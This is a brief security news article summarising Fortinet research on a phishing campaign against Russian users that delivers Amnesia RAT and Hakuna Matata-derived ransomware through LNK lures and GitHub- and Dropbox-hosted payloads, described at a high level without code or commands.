A new multi-stage phishing campaign is targeting users in Russia with a combination of ransomware and a remote access trojan known as Amnesia RAT, according to Fortinet FortiGuard Labs.
The attack uses social engineering lures delivered via business-themed documents with fake tasks or status messages. Threat actors leverage multiple public cloud services to distribute payloads, hosting scripts on GitHub while staging binary malware on Dropbox. The attackers are also using the Defendnot tool designed to trick Windows into disabling Microsoft Defender by posing as a genuine antivirus.
The phishing email contains a compressed archive with decoy files and a malicious Windows shortcut (LNK) using Russian-language filenames and a double extension to masquerade as a harmless text document. When opened, the shortcut launches a PowerShell command that downloads a first-stage loader from GitHub.
In the later stages, scripts are used that assemble payloads directly in memory, bypass security controls, and gain elevated privileges through repeated User Account Control prompts. The final phase delivers Amnesia RAT, capable of extensive data theft and remote control, alongside ransomware derived from the Hakuna Matata family. The ransomware encrypts a wide range of files, tampers with cryptocurrency clipboard data to redirect funds, and ultimately deploys a WinLocker to block user interaction.
“This attack chain demonstrates how modern malware campaigns can achieve full system compromise without exploiting software vulnerabilities. Instead, the threat actor relies on social engineering, widely trusted platforms such as GitHub and Dropbox, and the abuse of legitimate operating system functionality to stage, deliver, and execute payloads while blending into normal enterprise traffic,” the Fortinet researchers concluded.